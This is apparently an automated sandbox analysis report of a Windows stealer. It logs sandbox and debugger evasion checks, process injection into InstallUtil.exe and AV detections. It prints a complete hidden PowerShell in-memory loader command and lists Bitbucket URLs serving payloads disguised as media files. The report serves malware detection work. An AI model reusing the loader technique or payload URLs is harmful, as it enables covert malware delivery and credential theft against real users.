Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599076	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598966	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598835	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598712	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598593	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598244	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597193	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596948	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596698	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596567	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596230	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596108	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 595982	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 595867	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598998	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598883	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598773	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598664	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597193	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596699	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596432	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596310	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596153	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596029	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595918	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595811	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595696	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595445	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595335	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595216	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594780	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594561	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594303	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593873	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593764	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593327	Jump to behavior

Source: 849128312.cmd.Fjz, 00000007.00000002.2223259743.0000000008FD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42
Source: stealer-CR-0110.exe, 00000008.00000002.2211271521.00000000028E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: 849128312.cmd.Fjz, 00000007.00000002.2171542081.0000000002C90000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: stealer-CR-0110.exe, 00000008.00000002.2211271521.00000000028E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: 849128312.cmd.Fjz, 00000007.00000002.2211783683.00000000073EC000.00000004.00000020.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2209619324.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\849128312.cmd.Fjz

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process queried: DebugPort	Jump to behavior

Enables debug privileges

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\849128312.cmd.Fjz

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 780000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 404000	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 406000	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C48008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 780000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 782000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7EC000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7EE000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 570008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\849128312.cmd.Fjz	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\849128312.cmd.Fjz	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\849128312.cmd.Fjz C:\Users\user\Desktop\849128312.cmd.Fjz -WindowStyle hidden -command "$Kxrvrz = get-content 'C:\Users\user\Desktop\849128312.cmd' \| Select-Object -Last 1; $Rztxxaika = [System.Convert]::FromBase64String($Kxrvrz);$Jjvgcfjmzi = New-Object System.IO.MemoryStream( , $Rztxxaika );$Cheoysx = New-Object System.IO.MemoryStream;$Vrypedkztmk = New-Object System.IO.Compression.GzipStream $Jjvgcfjmzi, ([IO.Compression.CompressionMode]::Decompress);$Vrypedkztmk.CopyTo( $Cheoysx );$Vrypedkztmk.Close();$Jjvgcfjmzi.Close();[byte[]] $Rztxxaika = $Cheoysx.ToArray();[Array]::Reverse($Rztxxaika); $Nlmpmdzvlef = [System.AppDomain]::CurrentDomain.Load($Rztxxaika); $Hncpdnhhl = $Nlmpmdzvlef.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Hncpdnhhl.DeclaringType, $Hncpdnhhl.Name).DynamicInvoke() \| Out-Null"	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process created: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe "C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe"	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\849128312.cmd.Fjz c:\users\user\desktop\849128312.cmd.fjz -windowstyle hidden -command "$kxrvrz = get-content 'c:\users\user\desktop\849128312.cmd' \| select-object -last 1; $rztxxaika = [system.convert]::frombase64string($kxrvrz);$jjvgcfjmzi = new-object system.io.memorystream( , $rztxxaika );$cheoysx = new-object system.io.memorystream;$vrypedkztmk = new-object system.io.compression.gzipstream $jjvgcfjmzi, ([io.compression.compressionmode]::decompress);$vrypedkztmk.copyto( $cheoysx );$vrypedkztmk.close();$jjvgcfjmzi.close();[byte[]] $rztxxaika = $cheoysx.toarray();[array]::reverse($rztxxaika); $nlmpmdzvlef = [system.appdomain]::currentdomain.load($rztxxaika); $hncpdnhhl = $nlmpmdzvlef.entrypoint; [system.delegate]::createdelegate([action], $hncpdnhhl.declaringtype, $hncpdnhhl.name).dynamicinvoke() \| out-null"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\849128312.cmd.Fjz c:\users\user\desktop\849128312.cmd.fjz -windowstyle hidden -command "$kxrvrz = get-content 'c:\users\user\desktop\849128312.cmd' \| select-object -last 1; $rztxxaika = [system.convert]::frombase64string($kxrvrz);$jjvgcfjmzi = new-object system.io.memorystream( , $rztxxaika );$cheoysx = new-object system.io.memorystream;$vrypedkztmk = new-object system.io.compression.gzipstream $jjvgcfjmzi, ([io.compression.compressionmode]::decompress);$vrypedkztmk.copyto( $cheoysx );$vrypedkztmk.close();$jjvgcfjmzi.close();[byte[]] $rztxxaika = $cheoysx.toarray();[array]::reverse($rztxxaika); $nlmpmdzvlef = [system.appdomain]::currentdomain.load($rztxxaika); $hncpdnhhl = $nlmpmdzvlef.entrypoint; [system.delegate]::createdelegate([action], $hncpdnhhl.declaringtype, $hncpdnhhl.name).dynamicinvoke() \| out-null"			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\849128312.cmd.Fjz

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
3.5.27.130	unknown	United States	14618	AMAZON-AESUS	true
185.166.143.48	bitbucket.org	Germany	16509	AMAZON-02US	false
54.231.171.137	s3-w.us-east-1.amazonaws.com	United States	16509	AMAZON-02US	true

Contacted Domains

Name	IP	Active
s3-w.us-east-1.amazonaws.com	54.231.171.137	true
bitbucket.org	185.166.143.48	true
bbuseruploads.s3.amazonaws.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://bitbucket.org/312351234123/12312312412adsada/downloads/Gqjmdstn.pdf	false	0%, Virustotal, Browse	unknown
https://bitbucket.org/312351234123/12312312412adsada/downloads/Hgjcrxfnz.mp3	false	0%, Virustotal, Browse	unknown
https://bitbucket.org/312351234123/12312312412adsada/downloads/Llbodzuyqnk.wav	false	0%, Virustotal, Browse	unknown

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe

Avira: detection malicious, Label: HEUR/AGEN.1351837

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Virustotal: Detection: 63%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.231.171.137:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.27.130:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.27.130:443 -> 192.168.2.5:49709 version: TLS 1.2

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb9 source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbH source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
